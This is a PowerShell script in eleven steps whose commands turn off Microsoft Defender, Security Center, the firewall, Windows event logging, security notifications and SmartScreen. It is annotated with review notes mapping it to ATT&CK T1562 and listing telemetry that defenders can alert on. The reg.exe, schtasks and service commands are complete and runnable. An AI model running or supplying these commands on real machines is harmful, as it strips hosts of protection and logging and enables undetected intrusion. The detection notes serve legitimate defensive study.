# Review notes (defender view)
#
# Flat PowerShell script: reg.exe writes/deletes, one Set-MpPreference call,
# schtasks.exe changes and service stop/disable calls, in eleven numbered steps.
# Together they turn off Microsoft Defender Antivirus policy settings, the
# Security Center services and notifications, SmartScreen-related values and,
# in step 7, the firewall (MpsSvc, BFE) and event-logging (EventLog, Wecsvc)
# services. This is the behaviour catalogued as MITRE ATT&CK T1562
# "Impair Defenses" (.001 security tools, .002 event logging, .004 firewall).
#
# - No exit code is checked anywhere and step 7 passes -ea 0 (SilentlyContinue),
#   so a step that fails leaves no visible error; the end state has to be
#   verified from the registry and service configuration, not from the output.
# - HKLM/HKCR writes and service changes require elevation; the HKCU writes in
#   steps 10-11 only affect the account that runs the script.
# - Telemetry worth alerting on: process creation with these reg.exe /
#   schtasks.exe command lines (Security 4688 with command-line auditing,
#   Sysmon 1), registry value sets under the Defender keys (Sysmon 13,
#   Security 4657 where a SACL is set), Defender Operational 5001 / 5007,
#   Service Control Manager 7036 / 7040, and Security 1100 (event logging
#   service shut down). Because step 7 stops EventLog, rely on events that were
#   already forwarded off-host or on EDR sensor data for anything after it.
# - NOTE(review): with Tamper Protection enforced and centrally managed,
#   Defender is documented to protect several of these settings -- confirm it is
#   on for the fleet and alert on any change to its state.

# 1. Disable TamperProtection
# Writes TamperProtection=0 under the Defender "Features" key.
Write-Host "#1" -f Yellow
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f

# 2. Disable controlled folder access
# Turns off Controlled Folder Access through the Defender cmdlet.
Write-Host "#2" -f Yellow
Set-MpPreference -EnableControlledFolderAccess Disabled

# 3. Policies disabling Windows Defender and its components
# Every value here sits under HKLM\Software\Policies\..., i.e. the location
# Group Policy writes to. A baseline GPO/MDM profile that sets these values
# explicitly will overwrite them on refresh -- presumably the reason step 6
# also disables a policy-refresh task; verify refresh still runs.
Write-Host "#3" -f Yellow
# |% is ForEach-Object: one reg add per listed value name, each set to 0.
("AllowFastServiceStartup","ServiceKeepAlive") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "$_" /t REG_DWORD /d 0 /f}
# MpEnablePus=0: potentially-unwanted-software detection policy set to off.
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d 0 /f
# Top-level "Disable*" policy values, each set to 1.
("DisableAntiSpyware","DisableAntiVirus","DisableSpecialRunningModes") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "$_" /t REG_DWORD /d 1 /f}
# Real-time protection sub-policies (behaviour monitoring, IOAV, on-access,
# real-time monitoring, routine remediation, scan-on-enable), each set to 1.
("DisableBehaviorMonitoring","DisableIOAVProtection","DisableOnAccessProtection","DisableRealtimeMonitoring","DisableRoutinelyTakingAction","DisableScanOnRealtimeEnable") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "$_" /t REG_DWORD /d 1 /f}
# Cloud protection (SpyNet/MAPS) policies: reporting off, block-at-first-seen
# disabled, SubmitSamplesConsent=2 (documented as "never send").
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

# 4. Disable the SgrmBroker and SecurityHealthService services
# Start=4 is the "disabled" service start type. Written straight to the
# registry, so the Service Control Manager does not log a 7040 event for it;
# registry auditing is the signal here.
Write-Host "#4" -f Yellow
("SgrmBroker","SecurityHealthService") |% {reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f}

# 5. Disable the WMI Autologger sessions for Defender
# Start=0 on the two Defender autologger keys; presumably the trace sessions
# are then not started at the next boot -- confirm against ETW documentation.
Write-Host "#5" -f Yellow
("DefenderApiLogger","DefenderAuditLogger") |% {reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\$_" /v "Start" /t REG_DWORD /d 0 /f}

# 6. Disable the Windows Defender scheduled tasks
# Disables the ExploitGuard MDM policy refresh task and the four Defender
# maintenance/scan tasks. Task state changes are visible in the TaskScheduler
# operational log when that log is enabled.
Write-Host "#6" -f Yellow
schtasks /Change /tn "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /disable
("Windows Defender Cache Maintenance","Windows Defender Cleanup","Windows Defender Scheduled Scan","Windows Defender Verification") |% {schtasks /change /tn "Microsoft\Windows\Windows Defender\$_" /disable}

# 7. Disable the core protection services
# For each name: stop the service (spsv = Stop-Service), set it to Disabled via
# Set-Service, then write Start=4 and AutorunsDisabled=3 to its Services key.
# -ea 0 suppresses errors from the two cmdlets.
# The list reaches beyond Defender: MpsSvc/BFE are the firewall and its
# filtering engine, Wecsvc is the event collector and EventLog is the Windows
# Event Log service itself, so host logging stops at this point.
# "MpsSvc"/"mpssvc" name the same key (the registry is case-insensitive) and
# SgrmBroker/SecurityHealthService repeat step 4.
Write-Host "#7" -f Yellow
("Sense","webthreatdefsvc","webthreatdefusersvc","WdNisSvc","WdNisDrv","MDCoreSvc","SgrmBroker","SecurityHealthService","wscsvc","WinDefend","WdFilter","WdBoot","MpsSvc","mpssvc","BFE","Wecsvc","EventLog") |% {spsv $_ -force -ea 0; Set-Service $_ -st Disabled -ea 0; reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f; reg add "HKLM\System\CurrentControlSet\Services\$_" /v "AutorunsDisabled" /t REG_DWORD /d 3 /f}

# 8. Remove the SecurityHealth autostart entries
# Deletes the "SecurityHealth" value from the machine-wide Run key and from
# its StartupApproved counterpart.
Write-Host "#8" -f Yellow
("Explorer\StartupApproved\Run","Run") |% {reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\$_" /v "SecurityHealth" /f}

# 9. Remove the EPP context menu handlers
# Deletes the EPP shell-extension key for files (*), directories and drives;
# presumably this is the Defender "scan" context-menu entry -- confirm.
Write-Host "#9" -f Yellow
("*","Directory","Drive") |% {reg delete "HKCR\$_\shellex\ContextMenuHandlers\EPP" /f}

# 10. Disable all Windows Defender and system notifications
# Suppresses toast notifications and the notification center for the current
# user (HKCU) and Defender / Security Center notifications machine-wide (HKLM).
# After this the user is not shown security alerts, so detection cannot depend
# on user reports.
Write-Host "#10" -f Yellow
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SmartAppControl" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d 0 /f
("EnableNotifications","EnableToastApplicationNotification","NOC_GLOBAL_SETTING_TOASTS_ENABLED") |% {reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "$_" /t REG_DWORD /d 0 /f}
# Note the different path from the policy key above: this is the non-policy
# Security Center key under HKLM\SOFTWARE\Microsoft.
("DisableNotifications","DisableEnhancedNotifications","DisableMonitoring","DisableAlerts","DisableNotificationsUI","DisableNotificationCenter") |% {reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "$_" /t REG_DWORD /d 1 /f}

# 11. Disable SmartScreen and related features
Write-Host "#11" -f Yellow
# Explorer SmartScreen: string value set to "Off".
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d Off /f
# /ve writes the (default) value of a per-user key named after each item,
# rather than a named value under the Edge key.
("SmartScreenEnabled","SmartScreenPuaEnabled") |% {reg add "HKCU\Software\Microsoft\Edge\$_" /ve /t REG_DWORD /d 0 /f}
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
# Values under Control\CI (Code Integrity); VerifiedAndReputablePolicyState is
# presumably the Smart App Control state, 0 = off -- confirm against current
# Microsoft documentation. Changes under this key are worth a dedicated alert.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d 0 /f
("SvcEnabled","ServiceStart","ServiceState") |% {reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI" /v "$_" /t REG_DWORD /d 0 /f}